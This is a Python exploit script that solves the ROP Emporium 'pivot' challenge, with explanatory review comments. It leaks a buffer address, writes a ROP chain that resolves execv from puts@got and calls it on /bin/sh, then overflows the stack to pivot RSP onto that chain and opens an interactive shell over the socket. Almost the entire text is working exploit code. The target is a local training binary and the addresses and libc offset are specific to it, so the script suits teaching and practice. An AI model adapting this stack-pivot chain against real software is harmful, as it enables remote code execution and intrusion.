Solution for ROP Emporium pivot's challenge (https://ropemporium.com/challenge/pivot.html)
'''
Solution for ROP Emporium's "pivot" challenge (https://ropemporium.com/challenge/pivot.html)
It pops a remote shell.
Run the binary with: nc -lvc ./pivot -p 4444
Then, run this exploit :)
'''
import socket | |
from struct import pack | |
import telnetlib | |
def p64(x):
    """Pack the integer *x* as a little-endian signed 64-bit value.

    Returns the 8-byte encoding used for every pointer and gadget address
    placed into the ROP chains below.  Out-of-range values raise
    ``struct.error`` (via ``pack``).
    """
    little_endian_qword = "<q"
    return pack(little_endian_qword, x)
# Connect to the challenge binary, which the module docstring expects to be
# served locally on port 4444 through nc.
s = socket.socket(
    socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 4444))
data = s.recv(1000)
# print data
print "[+] Connected!"
# Read until the binary prints the "to pivot: " marker, which is followed by
# the address of the buffer that the first payload will be written to.
# NOTE(review): recv() returns '' once the peer closes the connection, so this
# loop spins forever if the marker never arrives; a socket timeout or an
# empty-read check would turn that into a visible failure.
while str.find(data, "to pivot: ") == -1:
    data += s.recv(1000)
# print data
pivot = str.find(data, "to pivot: ")
# Assumes the leaked address is printed as "0x" plus 12 hex digits (14 chars).
pivot = data[pivot+len("to pivot: "):pivot+len("to pivot: ")+14]
print "[+] Got Pivot: ", pivot
pivot = int(pivot, 16)
# First payload.  It is written into the leaked buffer and is not executed
# yet: it becomes the new stack once the second payload pivots RSP onto it.
# The command string is placed first so that pivot+len(command) is the start
# of the gadget chain.  All gadget addresses are fixed 0x400xxx values taken
# from the challenge binary (presumably a non-PIE build); they are specific
# to that binary and will not match any other build.
command = '/bin/sh\x00'
rop = command
rop += 'C'*8*3 # r13, r14, r15 -- consumed by the pop r13/r14/r15 of the pivot gadget after it has moved RSP here
rop += p64(0x400b00) # pop rax; ret; Set RAX=puts@got
rop += p64(0x602020) # puts@got
rop += p64(0x400900) # pop rbp; ret;
rop += p64(0x5D1D0) # execv-puts offset  -- NOTE(review): libc-specific constant, only valid for the libc the binary runs against
rop += p64(0x400b05) # mov rax, qword [rax]; ret; Set RAX=*puts@got (real memory address)
rop += p64(0x400b09) # add rax, rbp; ret; Add offset to calculate the execv position in memory
rop += p64(0x400b73) # pop rdi; ret; prepare arguments for execv: execv(rdi="bin/sh", rsi=0x0=NULL)
rop += p64(pivot) # rdi -- the buffer starts with the "/bin/sh\0" string
rop += p64(0x400b71) # pop rsi; pop r15; ret;
rop += p64(0x0) # rsi
rop += p64(0x0) # r15
rop += p64(0x400943) # jmp rax; Call execv (memory address calculated on RAX)
rop += '\n'
s.send(rop)
data += s.recv(1000)
print "[+] Pivot ROP sent.."
# Second payload: overflows the stack buffer (40 bytes of filler before the
# overwritten return address, judging by the 'A'*40) and returns into the
# stack-pivot gadget, which moves RSP to the first payload.
rop = 'A'*40
rop += p64(0x400b6d) # pop rsp; pop r13; pop r14; pop r15; ret; Create new stack frame on the first buffer (pivot)
rop += p64(pivot+len(command)) # new RSP: first payload, just past the command string
rop += 'B'*8 # filler; not consumed, since pop rsp has already moved the stack away from here
rop += '\n'
print "[+] Overflow ROP sent.."
s.send(rop)
data += s.recv(1000)
print "[+] Shell popped!"
# Hand the already-connected socket to telnetlib for an interactive session.
t = telnetlib.Telnet()
t.sock = s
t.interact()
#s.close()